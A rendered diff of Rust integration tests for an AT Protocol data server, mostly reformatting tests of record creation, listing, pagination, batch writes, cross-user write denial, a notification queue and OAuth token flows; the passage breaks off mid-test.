let res = client
379
-
.post(format!("{}/xrpc/com.atproto.repo.putRecord", base_url().await))
380
.bearer_auth(jwt)
381
.json(&payload)
382
.send()
···
384
.expect("Failed to create record");
385
assert_eq!(res.status(), StatusCode::OK);
386
let body: Value = res.json().await.unwrap();
387
-
(body["uri"].as_str().unwrap().to_string(), body["cid"].as_str().unwrap().to_string())
388
}
389
390
#[tokio::test]
···
392
let client = client();
393
let (did, jwt) = setup_new_user("list-records-test").await;
394
for i in 0..5 {
395
-
create_post_with_rkey(&client, &did, &jwt, &format!("post{:02}", i), &format!("Post {}", i)).await;
396
tokio::time::sleep(Duration::from_millis(50)).await;
397
}
398
let res = client
399
-
.get(format!("{}/xrpc/com.atproto.repo.listRecords", base_url().await))
400
.query(&[("repo", did.as_str()), ("collection", "app.bsky.feed.post")])
401
-
.send().await.expect("Failed to list records");
402
assert_eq!(res.status(), StatusCode::OK);
403
let body: Value = res.json().await.unwrap();
404
let records = body["records"].as_array().unwrap();
405
assert_eq!(records.len(), 5);
406
-
let rkeys: Vec<&str> = records.iter().map(|r| r["uri"].as_str().unwrap().split('/').last().unwrap()).collect();
407
-
assert_eq!(rkeys, vec!["post04", "post03", "post02", "post01", "post00"], "Default order should be DESC");
408
for record in records {
409
assert!(record["uri"].is_string());
410
assert!(record["cid"].is_string());
···
412
assert!(record["value"].is_object());
413
}
414
let rev_res = client
415
-
.get(format!("{}/xrpc/com.atproto.repo.listRecords", base_url().await))
416
-
.query(&[("repo", did.as_str()), ("collection", "app.bsky.feed.post"), ("reverse", "true")])
417
-
.send().await.expect("Failed to list records reverse");
418
let rev_body: Value = rev_res.json().await.unwrap();
419
-
let rev_rkeys: Vec<&str> = rev_body["records"].as_array().unwrap().iter()
420
-
.map(|r| r["uri"].as_str().unwrap().split('/').last().unwrap()).collect();
421
-
assert_eq!(rev_rkeys, vec!["post00", "post01", "post02", "post03", "post04"], "reverse=true should give ASC");
422
let page1 = client
423
-
.get(format!("{}/xrpc/com.atproto.repo.listRecords", base_url().await))
424
-
.query(&[("repo", did.as_str()), ("collection", "app.bsky.feed.post"), ("limit", "2")])
425
-
.send().await.expect("Failed to list page 1");
426
let page1_body: Value = page1.json().await.unwrap();
427
let page1_records = page1_body["records"].as_array().unwrap();
428
assert_eq!(page1_records.len(), 2);
429
let cursor = page1_body["cursor"].as_str().expect("Should have cursor");
430
let page2 = client
431
-
.get(format!("{}/xrpc/com.atproto.repo.listRecords", base_url().await))
432
-
.query(&[("repo", did.as_str()), ("collection", "app.bsky.feed.post"), ("limit", "2"), ("cursor", cursor)])
433
-
.send().await.expect("Failed to list page 2");
434
let page2_body: Value = page2.json().await.unwrap();
435
let page2_records = page2_body["records"].as_array().unwrap();
436
assert_eq!(page2_records.len(), 2);
437
-
let all_uris: Vec<&str> = page1_records.iter().chain(page2_records.iter())
438
-
.map(|r| r["uri"].as_str().unwrap()).collect();
439
let unique_uris: std::collections::HashSet<&str> = all_uris.iter().copied().collect();
440
-
assert_eq!(all_uris.len(), unique_uris.len(), "Cursor pagination should not repeat records");
441
let range_res = client
442
-
.get(format!("{}/xrpc/com.atproto.repo.listRecords", base_url().await))
443
-
.query(&[("repo", did.as_str()), ("collection", "app.bsky.feed.post"),
444
-
("rkeyStart", "post01"), ("rkeyEnd", "post03"), ("reverse", "true")])
445
-
.send().await.expect("Failed to list range");
446
let range_body: Value = range_res.json().await.unwrap();
447
-
let range_rkeys: Vec<&str> = range_body["records"].as_array().unwrap().iter()
448
-
.map(|r| r["uri"].as_str().unwrap().split('/').last().unwrap()).collect();
449
for rkey in &range_rkeys {
450
-
assert!(*rkey >= "post01" && *rkey <= "post03", "Range should be inclusive");
451
}
452
let limit_res = client
453
-
.get(format!("{}/xrpc/com.atproto.repo.listRecords", base_url().await))
454
-
.query(&[("repo", did.as_str()), ("collection", "app.bsky.feed.post"), ("limit", "1000")])
455
-
.send().await.expect("Failed with high limit");
456
let limit_body: Value = limit_res.json().await.unwrap();
457
-
assert!(limit_body["records"].as_array().unwrap().len() <= 100, "Limit should be clamped to max 100");
458
let not_found_res = client
459
-
.get(format!("{}/xrpc/com.atproto.repo.listRecords", base_url().await))
460
-
.query(&[("repo", "did:plc:nonexistent12345"), ("collection", "app.bsky.feed.post")])
461
-
.send().await.expect("Failed with nonexistent repo");
462
assert_eq!(not_found_res.status(), StatusCode::NOT_FOUND);
463
}
···
26
}
27
});
28
let create_res = client
29
+
.post(format!(
30
+
"{}/xrpc/com.atproto.repo.putRecord",
31
+
base_url().await
32
+
))
33
.bearer_auth(&jwt)
34
.json(&create_payload)
35
.send()
36
.await
37
.expect("Failed to send create request");
38
+
assert_eq!(
39
+
create_res.status(),
40
+
StatusCode::OK,
41
+
"Failed to create record"
42
+
);
43
+
let create_body: Value = create_res
44
+
.json()
45
+
.await
46
+
.expect("create response was not JSON");
47
let uri = create_body["uri"].as_str().unwrap();
48
let initial_cid = create_body["cid"].as_str().unwrap().to_string();
49
+
let params = [
50
+
("repo", did.as_str()),
51
+
("collection", collection),
52
+
("rkey", &rkey),
53
+
];
54
let get_res = client
55
+
.get(format!(
56
+
"{}/xrpc/com.atproto.repo.getRecord",
57
+
base_url().await
58
+
))
59
.query(¶ms)
60
.send()
61
.await
62
.expect("Failed to send get request");
63
+
assert_eq!(
64
+
get_res.status(),
65
+
StatusCode::OK,
66
+
"Failed to get record after create"
67
+
);
68
let get_body: Value = get_res.json().await.expect("get response was not JSON");
69
assert_eq!(get_body["uri"], uri);
70
assert_eq!(get_body["value"]["text"], original_text);
···
77
"swapRecord": initial_cid
78
});
79
let update_res = client
80
+
.post(format!(
81
+
"{}/xrpc/com.atproto.repo.putRecord",
82
+
base_url().await
83
+
))
84
.bearer_auth(&jwt)
85
.json(&update_payload)
86
.send()
87
.await
88
.expect("Failed to send update request");
89
+
assert_eq!(
90
+
update_res.status(),
91
+
StatusCode::OK,
92
+
"Failed to update record"
93
+
);
94
+
let update_body: Value = update_res
95
+
.json()
96
+
.await
97
+
.expect("update response was not JSON");
98
let updated_cid = update_body["cid"].as_str().unwrap().to_string();
99
let get_updated_res = client
100
+
.get(format!(
101
+
"{}/xrpc/com.atproto.repo.getRecord",
102
+
base_url().await
103
+
))
104
.query(¶ms)
105
.send()
106
.await
107
.expect("Failed to send get-after-update request");
108
+
let get_updated_body: Value = get_updated_res
109
+
.json()
110
+
.await
111
+
.expect("get-updated response was not JSON");
112
+
assert_eq!(
113
+
get_updated_body["value"]["text"], updated_text,
114
+
"Text was not updated"
115
+
);
116
let stale_update_payload = json!({
117
"repo": did,
118
"collection": collection,
···
121
"swapRecord": initial_cid
122
});
123
let stale_res = client
124
+
.post(format!(
125
+
"{}/xrpc/com.atproto.repo.putRecord",
126
+
base_url().await
127
+
))
128
.bearer_auth(&jwt)
129
.json(&stale_update_payload)
130
.send()
131
.await
132
.expect("Failed to send stale update");
133
+
assert_eq!(
134
+
stale_res.status(),
135
+
StatusCode::CONFLICT,
136
+
"Stale update should cause 409"
137
+
);
138
let good_update_payload = json!({
139
"repo": did,
140
"collection": collection,
···
143
"swapRecord": updated_cid
144
});
145
let good_res = client
146
+
.post(format!(
147
+
"{}/xrpc/com.atproto.repo.putRecord",
148
+
base_url().await
149
+
))
150
.bearer_auth(&jwt)
151
.json(&good_update_payload)
152
.send()
153
.await
154
.expect("Failed to send good update");
155
+
assert_eq!(
156
+
good_res.status(),
157
+
StatusCode::OK,
158
+
"Good update should succeed"
159
+
);
160
let delete_payload = json!({ "repo": did, "collection": collection, "rkey": rkey });
161
let delete_res = client
162
+
.post(format!(
163
+
"{}/xrpc/com.atproto.repo.deleteRecord",
164
+
base_url().await
165
+
))
166
.bearer_auth(&jwt)
167
.json(&delete_payload)
168
.send()
169
.await
170
.expect("Failed to send delete request");
171
+
assert_eq!(
172
+
delete_res.status(),
173
+
StatusCode::OK,
174
+
"Failed to delete record"
175
+
);
176
let get_deleted_res = client
177
+
.get(format!(
178
+
"{}/xrpc/com.atproto.repo.getRecord",
179
+
base_url().await
180
+
))
181
.query(¶ms)
182
.send()
183
.await
184
.expect("Failed to send get-after-delete request");
185
+
assert_eq!(
186
+
get_deleted_res.status(),
187
+
StatusCode::NOT_FOUND,
188
+
"Record should be deleted"
189
+
);
190
}
191
192
#[tokio::test]
···
195
let (did, jwt) = setup_new_user("profile-blob").await;
196
let blob_data = b"This is test blob data for a profile avatar";
197
let upload_res = client
198
+
.post(format!(
199
+
"{}/xrpc/com.atproto.repo.uploadBlob",
200
+
base_url().await
201
+
))
202
.header(header::CONTENT_TYPE, "text/plain")
203
.bearer_auth(&jwt)
204
.body(blob_data.to_vec())
···
220
}
221
});
222
let create_res = client
223
+
.post(format!(
224
+
"{}/xrpc/com.atproto.repo.putRecord",
225
+
base_url().await
226
+
))
227
.bearer_auth(&jwt)
228
.json(&profile_payload)
229
.send()
230
.await
231
.expect("Failed to create profile");
232
+
assert_eq!(
233
+
create_res.status(),
234
+
StatusCode::OK,
235
+
"Failed to create profile"
236
+
);
237
let create_body: Value = create_res.json().await.unwrap();
238
let initial_cid = create_body["cid"].as_str().unwrap().to_string();
239
let get_res = client
240
+
.get(format!(
241
+
"{}/xrpc/com.atproto.repo.getRecord",
242
+
base_url().await
243
+
))
244
+
.query(&[
245
+
("repo", did.as_str()),
246
+
("collection", "app.bsky.actor.profile"),
247
+
("rkey", "self"),
248
+
])
249
.send()
250
.await
251
.expect("Failed to get profile");
···
261
"swapRecord": initial_cid
262
});
263
let update_res = client
264
+
.post(format!(
265
+
"{}/xrpc/com.atproto.repo.putRecord",
266
+
base_url().await
267
+
))
268
.bearer_auth(&jwt)
269
.json(&update_payload)
270
.send()
271
.await
272
.expect("Failed to update profile");
273
+
assert_eq!(
274
+
update_res.status(),
275
+
StatusCode::OK,
276
+
"Failed to update profile"
277
+
);
278
let get_updated_res = client
279
+
.get(format!(
280
+
"{}/xrpc/com.atproto.repo.getRecord",
281
+
base_url().await
282
+
))
283
+
.query(&[
284
+
("repo", did.as_str()),
285
+
("collection", "app.bsky.actor.profile"),
286
+
("rkey", "self"),
287
+
])
288
.send()
289
.await
290
.expect("Failed to get updated profile");
···
297
let client = client();
298
let (alice_did, alice_jwt) = setup_new_user("alice-thread").await;
299
let (bob_did, bob_jwt) = setup_new_user("bob-thread").await;
300
+
let (root_uri, root_cid) =
301
+
create_post(&client, &alice_did, &alice_jwt, "This is the root post").await;
302
tokio::time::sleep(Duration::from_millis(100)).await;
303
let reply_collection = "app.bsky.feed.post";
304
let reply_rkey = format!("e2e_reply_{}", Utc::now().timestamp_millis());
···
317
}
318
});
319
let reply_res = client
320
+
.post(format!(
321
+
"{}/xrpc/com.atproto.repo.putRecord",
322
+
base_url().await
323
+
))
324
.bearer_auth(&bob_jwt)
325
.json(&reply_payload)
326
.send()
···
331
let reply_uri = reply_body["uri"].as_str().unwrap();
332
let reply_cid = reply_body["cid"].as_str().unwrap();
333
let get_reply_res = client
334
+
.get(format!(
335
+
"{}/xrpc/com.atproto.repo.getRecord",
336
+
base_url().await
337
+
))
338
+
.query(&[
339
+
("repo", bob_did.as_str()),
340
+
("collection", reply_collection),
341
+
("rkey", reply_rkey.as_str()),
342
+
])
343
.send()
344
.await
345
.expect("Failed to get reply");
···
363
}
364
});
365
let nested_res = client
366
+
.post(format!(
367
+
"{}/xrpc/com.atproto.repo.putRecord",
368
+
base_url().await
369
+
))
370
.bearer_auth(&alice_jwt)
371
.json(&nested_payload)
372
.send()
373
.await
374
.expect("Failed to create nested reply");
375
+
assert_eq!(
376
+
nested_res.status(),
377
+
StatusCode::OK,
378
+
"Failed to create nested reply"
379
+
);
380
}
381
382
#[tokio::test]
···
393
"record": { "$type": "app.bsky.feed.post", "text": "Bob trying to post as Alice", "createdAt": Utc::now().to_rfc3339() }
394
});
395
let write_res = client
396
+
.post(format!(
397
+
"{}/xrpc/com.atproto.repo.putRecord",
398
+
base_url().await
399
+
))
400
.bearer_auth(&bob_jwt)
401
.json(&post_payload)
402
.send()
403
.await
404
.expect("Failed to send request");
405
+
assert!(
406
+
write_res.status() == StatusCode::FORBIDDEN
407
+
|| write_res.status() == StatusCode::UNAUTHORIZED,
408
+
"Expected 403/401 for writing to another user's repo, got {}",
409
+
write_res.status()
410
+
);
411
+
let delete_payload =
412
+
json!({ "repo": alice_did, "collection": "app.bsky.feed.post", "rkey": post_rkey });
413
let delete_res = client
414
+
.post(format!(
415
+
"{}/xrpc/com.atproto.repo.deleteRecord",
416
+
base_url().await
417
+
))
418
.bearer_auth(&bob_jwt)
419
.json(&delete_payload)
420
.send()
421
.await
422
.expect("Failed to send request");
423
+
assert!(
424
+
delete_res.status() == StatusCode::FORBIDDEN
425
+
|| delete_res.status() == StatusCode::UNAUTHORIZED,
426
+
"Expected 403/401 for deleting another user's record, got {}",
427
+
delete_res.status()
428
+
);
429
let get_res = client
430
+
.get(format!(
431
+
"{}/xrpc/com.atproto.repo.getRecord",
432
+
base_url().await
433
+
))
434
+
.query(&[
435
+
("repo", alice_did.as_str()),
436
+
("collection", "app.bsky.feed.post"),
437
+
("rkey", post_rkey),
438
+
])
439
.send()
440
.await
441
.expect("Failed to verify record exists");
442
+
assert_eq!(
443
+
get_res.status(),
444
+
StatusCode::OK,
445
+
"Record should still exist"
446
+
);
447
}
448
449
#[tokio::test]
···
460
]
461
});
462
let apply_res = client
463
+
.post(format!(
464
+
"{}/xrpc/com.atproto.repo.applyWrites",
465
+
base_url().await
466
+
))
467
.bearer_auth(&jwt)
468
.json(&writes_payload)
469
.send()
···
471
.expect("Failed to apply writes");
472
assert_eq!(apply_res.status(), StatusCode::OK);
473
let get_post1 = client
474
+
.get(format!(
475
+
"{}/xrpc/com.atproto.repo.getRecord",
476
+
base_url().await
477
+
))
478
+
.query(&[
479
+
("repo", did.as_str()),
480
+
("collection", "app.bsky.feed.post"),
481
+
("rkey", "batch-post-1"),
482
+
])
483
+
.send()
484
+
.await
485
+
.expect("Failed to get post 1");
486
assert_eq!(get_post1.status(), StatusCode::OK);
487
let post1_body: Value = get_post1.json().await.unwrap();
488
assert_eq!(post1_body["value"]["text"], "First batch post");
489
let get_post2 = client
490
+
.get(format!(
491
+
"{}/xrpc/com.atproto.repo.getRecord",
492
+
base_url().await
493
+
))
494
+
.query(&[
495
+
("repo", did.as_str()),
496
+
("collection", "app.bsky.feed.post"),
497
+
("rkey", "batch-post-2"),
498
+
])
499
+
.send()
500
+
.await
501
+
.expect("Failed to get post 2");
502
assert_eq!(get_post2.status(), StatusCode::OK);
503
let get_profile = client
504
+
.get(format!(
505
+
"{}/xrpc/com.atproto.repo.getRecord",
506
+
base_url().await
507
+
))
508
+
.query(&[
509
+
("repo", did.as_str()),
510
+
("collection", "app.bsky.actor.profile"),
511
+
("rkey", "self"),
512
+
])
513
+
.send()
514
+
.await
515
+
.expect("Failed to get profile");
516
let profile_body: Value = get_profile.json().await.unwrap();
517
assert_eq!(profile_body["value"]["displayName"], "Batch User");
518
let update_writes = json!({
···
523
]
524
});
525
let update_res = client
526
+
.post(format!(
527
+
"{}/xrpc/com.atproto.repo.applyWrites",
528
+
base_url().await
529
+
))
530
.bearer_auth(&jwt)
531
.json(&update_writes)
532
.send()
···
534
.expect("Failed to apply update writes");
535
assert_eq!(update_res.status(), StatusCode::OK);
536
let get_updated_profile = client
537
+
.get(format!(
538
+
"{}/xrpc/com.atproto.repo.getRecord",
539
+
base_url().await
540
+
))
541
+
.query(&[
542
+
("repo", did.as_str()),
543
+
("collection", "app.bsky.actor.profile"),
544
+
("rkey", "self"),
545
+
])
546
+
.send()
547
+
.await
548
+
.expect("Failed to get updated profile");
549
let updated_profile: Value = get_updated_profile.json().await.unwrap();
550
+
assert_eq!(
551
+
updated_profile["value"]["displayName"],
552
+
"Updated Batch User"
553
+
);
554
let get_deleted_post = client
555
+
.get(format!(
556
+
"{}/xrpc/com.atproto.repo.getRecord",
557
+
base_url().await
558
+
))
559
+
.query(&[
560
+
("repo", did.as_str()),
561
+
("collection", "app.bsky.feed.post"),
562
+
("rkey", "batch-post-1"),
563
+
])
564
+
.send()
565
+
.await
566
+
.expect("Failed to check deleted post");
567
+
assert_eq!(
568
+
get_deleted_post.status(),
569
+
StatusCode::NOT_FOUND,
570
+
"Batch-deleted post should be gone"
571
+
);
572
}
573
574
+
async fn create_post_with_rkey(
575
+
client: &reqwest::Client,
576
+
did: &str,
577
+
jwt: &str,
578
+
rkey: &str,
579
+
text: &str,
580
+
) -> (String, String) {
581
let payload = json!({
582
"repo": did, "collection": "app.bsky.feed.post", "rkey": rkey,
583
"record": { "$type": "app.bsky.feed.post", "text": text, "createdAt": Utc::now().to_rfc3339() }
584
});
585
let res = client
586
+
.post(format!(
587
+
"{}/xrpc/com.atproto.repo.putRecord",
588
+
base_url().await
589
+
))
590
.bearer_auth(jwt)
591
.json(&payload)
592
.send()
···
594
.expect("Failed to create record");
595
assert_eq!(res.status(), StatusCode::OK);
596
let body: Value = res.json().await.unwrap();
597
+
(
598
+
body["uri"].as_str().unwrap().to_string(),
599
+
body["cid"].as_str().unwrap().to_string(),
600
+
)
601
}
602
603
#[tokio::test]
···
605
let client = client();
606
let (did, jwt) = setup_new_user("list-records-test").await;
607
for i in 0..5 {
608
+
create_post_with_rkey(
609
+
&client,
610
+
&did,
611
+
&jwt,
612
+
&format!("post{:02}", i),
613
+
&format!("Post {}", i),
614
+
)
615
+
.await;
616
tokio::time::sleep(Duration::from_millis(50)).await;
617
}
618
let res = client
619
+
.get(format!(
620
+
"{}/xrpc/com.atproto.repo.listRecords",
621
+
base_url().await
622
+
))
623
.query(&[("repo", did.as_str()), ("collection", "app.bsky.feed.post")])
624
+
.send()
625
+
.await
626
+
.expect("Failed to list records");
627
assert_eq!(res.status(), StatusCode::OK);
628
let body: Value = res.json().await.unwrap();
629
let records = body["records"].as_array().unwrap();
630
assert_eq!(records.len(), 5);
631
+
let rkeys: Vec<&str> = records
632
+
.iter()
633
+
.map(|r| r["uri"].as_str().unwrap().split('/').last().unwrap())
634
+
.collect();
635
+
assert_eq!(
636
+
rkeys,
637
+
vec!["post04", "post03", "post02", "post01", "post00"],
638
+
"Default order should be DESC"
639
+
);
640
for record in records {
641
assert!(record["uri"].is_string());
642
assert!(record["cid"].is_string());
···
644
assert!(record["value"].is_object());
645
}
646
let rev_res = client
647
+
.get(format!(
648
+
"{}/xrpc/com.atproto.repo.listRecords",
649
+
base_url().await
650
+
))
651
+
.query(&[
652
+
("repo", did.as_str()),
653
+
("collection", "app.bsky.feed.post"),
654
+
("reverse", "true"),
655
+
])
656
+
.send()
657
+
.await
658
+
.expect("Failed to list records reverse");
659
let rev_body: Value = rev_res.json().await.unwrap();
660
+
let rev_rkeys: Vec<&str> = rev_body["records"]
661
+
.as_array()
662
+
.unwrap()
663
+
.iter()
664
+
.map(|r| r["uri"].as_str().unwrap().split('/').last().unwrap())
665
+
.collect();
666
+
assert_eq!(
667
+
rev_rkeys,
668
+
vec!["post00", "post01", "post02", "post03", "post04"],
669
+
"reverse=true should give ASC"
670
+
);
671
let page1 = client
672
+
.get(format!(
673
+
"{}/xrpc/com.atproto.repo.listRecords",
674
+
base_url().await
675
+
))
676
+
.query(&[
677
+
("repo", did.as_str()),
678
+
("collection", "app.bsky.feed.post"),
679
+
("limit", "2"),
680
+
])
681
+
.send()
682
+
.await
683
+
.expect("Failed to list page 1");
684
let page1_body: Value = page1.json().await.unwrap();
685
let page1_records = page1_body["records"].as_array().unwrap();
686
assert_eq!(page1_records.len(), 2);
687
let cursor = page1_body["cursor"].as_str().expect("Should have cursor");
688
let page2 = client
689
+
.get(format!(
690
+
"{}/xrpc/com.atproto.repo.listRecords",
691
+
base_url().await
692
+
))
693
+
.query(&[
694
+
("repo", did.as_str()),
695
+
("collection", "app.bsky.feed.post"),
696
+
("limit", "2"),
697
+
("cursor", cursor),
698
+
])
699
+
.send()
700
+
.await
701
+
.expect("Failed to list page 2");
702
let page2_body: Value = page2.json().await.unwrap();
703
let page2_records = page2_body["records"].as_array().unwrap();
704
assert_eq!(page2_records.len(), 2);
705
+
let all_uris: Vec<&str> = page1_records
706
+
.iter()
707
+
.chain(page2_records.iter())
708
+
.map(|r| r["uri"].as_str().unwrap())
709
+
.collect();
710
let unique_uris: std::collections::HashSet<&str> = all_uris.iter().copied().collect();
711
+
assert_eq!(
712
+
all_uris.len(),
713
+
unique_uris.len(),
714
+
"Cursor pagination should not repeat records"
715
+
);
716
let range_res = client
717
+
.get(format!(
718
+
"{}/xrpc/com.atproto.repo.listRecords",
719
+
base_url().await
720
+
))
721
+
.query(&[
722
+
("repo", did.as_str()),
723
+
("collection", "app.bsky.feed.post"),
724
+
("rkeyStart", "post01"),
725
+
("rkeyEnd", "post03"),
726
+
("reverse", "true"),
727
+
])
728
+
.send()
729
+
.await
730
+
.expect("Failed to list range");
731
let range_body: Value = range_res.json().await.unwrap();
732
+
let range_rkeys: Vec<&str> = range_body["records"]
733
+
.as_array()
734
+
.unwrap()
735
+
.iter()
736
+
.map(|r| r["uri"].as_str().unwrap().split('/').last().unwrap())
737
+
.collect();
738
for rkey in &range_rkeys {
739
+
assert!(
740
+
*rkey >= "post01" && *rkey <= "post03",
741
+
"Range should be inclusive"
742
+
);
743
}
744
let limit_res = client
745
+
.get(format!(
746
+
"{}/xrpc/com.atproto.repo.listRecords",
747
+
base_url().await
748
+
))
749
+
.query(&[
750
+
("repo", did.as_str()),
751
+
("collection", "app.bsky.feed.post"),
752
+
("limit", "1000"),
753
+
])
754
+
.send()
755
+
.await
756
+
.expect("Failed with high limit");
757
let limit_body: Value = limit_res.json().await.unwrap();
758
+
assert!(
759
+
limit_body["records"].as_array().unwrap().len() <= 100,
760
+
"Limit should be clamped to max 100"
761
+
);
762
let not_found_res = client
763
+
.get(format!(
764
+
"{}/xrpc/com.atproto.repo.listRecords",
765
+
base_url().await
766
+
))
767
+
.query(&[
768
+
("repo", "did:plc:nonexistent12345"),
769
+
("collection", "app.bsky.feed.post"),
770
+
])
771
+
.send()
772
+
.await
773
+
.expect("Failed with nonexistent repo");
774
assert_eq!(not_found_res.status(), StatusCode::NOT_FOUND);
775
}
+2
-4
tests/notifications.rs
+2
-4
tests/notifications.rs
···
1
mod common;
2
use tranquil_pds::comms::{
3
CommsChannel, CommsStatus, CommsType, NewComms, enqueue_comms, enqueue_welcome,
4
};
5
-
use sqlx::PgPool;
6
7
async fn get_pool() -> PgPool {
8
let conn_str = common::get_db_connection_string().await;
···
109
"Test".to_string(),
110
"Body".to_string(),
111
);
112
-
enqueue_comms(&pool, item)
113
-
.await
114
-
.expect("Failed to enqueue");
115
}
116
let final_count: i64 = sqlx::query_scalar!(
117
"SELECT COUNT(*) FROM comms_queue WHERE status = 'pending' AND user_id = $1",
···
1
mod common;
2
+
use sqlx::PgPool;
3
use tranquil_pds::comms::{
4
CommsChannel, CommsStatus, CommsType, NewComms, enqueue_comms, enqueue_welcome,
5
};
6
7
async fn get_pool() -> PgPool {
8
let conn_str = common::get_db_connection_string().await;
···
109
"Test".to_string(),
110
"Body".to_string(),
111
);
112
+
enqueue_comms(&pool, item).await.expect("Failed to enqueue");
113
}
114
let final_count: i64 = sqlx::query_scalar!(
115
"SELECT COUNT(*) FROM comms_queue WHERE status = 'pending' AND user_id = $1",
+903
-143
tests/oauth.rs
+903
-143
tests/oauth.rs
···
11
use wiremock::{Mock, MockServer, ResponseTemplate};
12
13
fn no_redirect_client() -> reqwest::Client {
14
-
reqwest::Client::builder().redirect(redirect::Policy::none()).build().unwrap()
15
}
16
17
fn generate_pkce() -> (String, String) {
···
47
async fn test_oauth_metadata_endpoints() {
48
let url = base_url().await;
49
let client = client();
50
-
let pr_res = client.get(format!("{}/.well-known/oauth-protected-resource", url)).send().await.unwrap();
51
assert_eq!(pr_res.status(), StatusCode::OK);
52
let pr_body: Value = pr_res.json().await.unwrap();
53
assert!(pr_body["resource"].is_string());
54
assert!(pr_body["authorization_servers"].is_array());
55
-
assert!(pr_body["bearer_methods_supported"].as_array().unwrap().contains(&json!("header")));
56
-
let as_res = client.get(format!("{}/.well-known/oauth-authorization-server", url)).send().await.unwrap();
57
assert_eq!(as_res.status(), StatusCode::OK);
58
let as_body: Value = as_res.json().await.unwrap();
59
assert!(as_body["issuer"].is_string());
60
assert!(as_body["authorization_endpoint"].is_string());
61
assert!(as_body["token_endpoint"].is_string());
62
assert!(as_body["jwks_uri"].is_string());
63
-
assert!(as_body["response_types_supported"].as_array().unwrap().contains(&json!("code")));
64
-
assert!(as_body["grant_types_supported"].as_array().unwrap().contains(&json!("authorization_code")));
65
-
assert!(as_body["code_challenge_methods_supported"].as_array().unwrap().contains(&json!("S256")));
66
-
assert_eq!(as_body["require_pushed_authorization_requests"], json!(true));
67
-
assert!(as_body["dpop_signing_alg_values_supported"].as_array().unwrap().contains(&json!("ES256")));
68
-
let jwks_res = client.get(format!("{}/oauth/jwks", url)).send().await.unwrap();
69
assert_eq!(jwks_res.status(), StatusCode::OK);
70
let jwks_body: Value = jwks_res.json().await.unwrap();
71
assert!(jwks_body["keys"].is_array());
···
81
let (_, code_challenge) = generate_pkce();
82
let par_res = client
83
.post(format!("{}/oauth/par", url))
84
-
.form(&[("response_type", "code"), ("client_id", &client_id), ("redirect_uri", redirect_uri),
85
-
("code_challenge", &code_challenge), ("code_challenge_method", "S256"), ("scope", "atproto"), ("state", "test-state")])
86
-
.send().await.unwrap();
87
assert_eq!(par_res.status(), StatusCode::CREATED, "PAR should succeed");
88
let par_body: Value = par_res.json().await.unwrap();
89
assert!(par_body["request_uri"].is_string());
···
94
.get(format!("{}/oauth/authorize", url))
95
.header("Accept", "application/json")
96
.query(&[("request_uri", request_uri)])
97
-
.send().await.unwrap();
98
assert_eq!(auth_res.status(), StatusCode::OK);
99
let auth_body: Value = auth_res.json().await.unwrap();
100
assert_eq!(auth_body["client_id"], client_id);
···
103
let invalid_res = client
104
.get(format!("{}/oauth/authorize", url))
105
.header("Accept", "application/json")
106
-
.query(&[("request_uri", "urn:ietf:params:oauth:request_uri:nonexistent")])
107
-
.send().await.unwrap();
108
assert_eq!(invalid_res.status(), StatusCode::BAD_REQUEST);
109
-
let missing_res = client.get(format!("{}/oauth/authorize", url)).send().await.unwrap();
110
-
assert_eq!(missing_res.status(), StatusCode::BAD_REQUEST);
111
}
112
113
#[tokio::test]
···
121
let create_res = http_client
122
.post(format!("{}/xrpc/com.atproto.server.createAccount", url))
123
.json(&json!({ "handle": handle, "email": email, "password": password }))
124
-
.send().await.unwrap();
125
assert_eq!(create_res.status(), StatusCode::OK);
126
let account: Value = create_res.json().await.unwrap();
127
let user_did = account["did"].as_str().unwrap();
···
133
let state = format!("state-{}", ts);
134
let par_res = http_client
135
.post(format!("{}/oauth/par", url))
136
-
.form(&[("response_type", "code"), ("client_id", &client_id), ("redirect_uri", redirect_uri),
137
-
("code_challenge", &code_challenge), ("code_challenge_method", "S256"), ("scope", "atproto"), ("state", &state)])
138
-
.send().await.unwrap();
139
let par_body: Value = par_res.json().await.unwrap();
140
let request_uri = par_body["request_uri"].as_str().unwrap();
141
-
let auth_client = no_redirect_client();
142
-
let auth_res = auth_client
143
.post(format!("{}/oauth/authorize", url))
144
-
.form(&[("request_uri", request_uri), ("username", &handle), ("password", password), ("remember_device", "false")])
145
.send().await.unwrap();
146
-
assert!(auth_res.status().is_redirection(), "Expected redirect, got {}", auth_res.status());
147
-
let location = auth_res.headers().get("location").unwrap().to_str().unwrap();
148
-
assert!(location.starts_with(redirect_uri), "Redirect to wrong URI");
149
assert!(location.contains("code="), "No code in redirect");
150
-
assert!(location.contains(&format!("state={}", state)), "Wrong state");
151
-
let code = location.split("code=").nth(1).unwrap().split('&').next().unwrap();
152
let token_res = http_client
153
.post(format!("{}/oauth/token", url))
154
-
.form(&[("grant_type", "authorization_code"), ("code", code), ("redirect_uri", redirect_uri),
155
-
("code_verifier", &code_verifier), ("client_id", &client_id)])
156
-
.send().await.unwrap();
157
assert_eq!(token_res.status(), StatusCode::OK, "Token exchange failed");
158
let token_body: Value = token_res.json().await.unwrap();
159
assert!(token_body["access_token"].is_string());
···
165
let refresh_token = token_body["refresh_token"].as_str().unwrap();
166
let refresh_res = http_client
167
.post(format!("{}/oauth/token", url))
168
-
.form(&[("grant_type", "refresh_token"), ("refresh_token", refresh_token), ("client_id", &client_id)])
169
-
.send().await.unwrap();
170
assert_eq!(refresh_res.status(), StatusCode::OK);
171
let refresh_body: Value = refresh_res.json().await.unwrap();
172
assert_ne!(refresh_body["access_token"].as_str().unwrap(), access_token);
173
-
assert_ne!(refresh_body["refresh_token"].as_str().unwrap(), refresh_token);
174
let introspect_res = http_client
175
.post(format!("{}/oauth/introspect", url))
176
.form(&[("token", refresh_body["access_token"].as_str().unwrap())])
177
-
.send().await.unwrap();
178
assert_eq!(introspect_res.status(), StatusCode::OK);
179
let introspect_body: Value = introspect_res.json().await.unwrap();
180
assert_eq!(introspect_body["active"], true);
181
let revoke_res = http_client
182
.post(format!("{}/oauth/revoke", url))
183
.form(&[("token", refresh_body["refresh_token"].as_str().unwrap())])
184
-
.send().await.unwrap();
185
assert_eq!(revoke_res.status(), StatusCode::OK);
186
let introspect_after = http_client
187
.post(format!("{}/oauth/introspect", url))
188
.form(&[("token", refresh_body["access_token"].as_str().unwrap())])
189
-
.send().await.unwrap();
190
let after_body: Value = introspect_after.json().await.unwrap();
191
-
assert_eq!(after_body["active"], false, "Revoked token should be inactive");
192
}
193
194
#[tokio::test]
···
198
let ts = Utc::now().timestamp_millis();
199
let handle = format!("wrong-creds-{}", ts);
200
let email = format!("wrong-creds-{}@example.com", ts);
201
-
http_client.post(format!("{}/xrpc/com.atproto.server.createAccount", url))
202
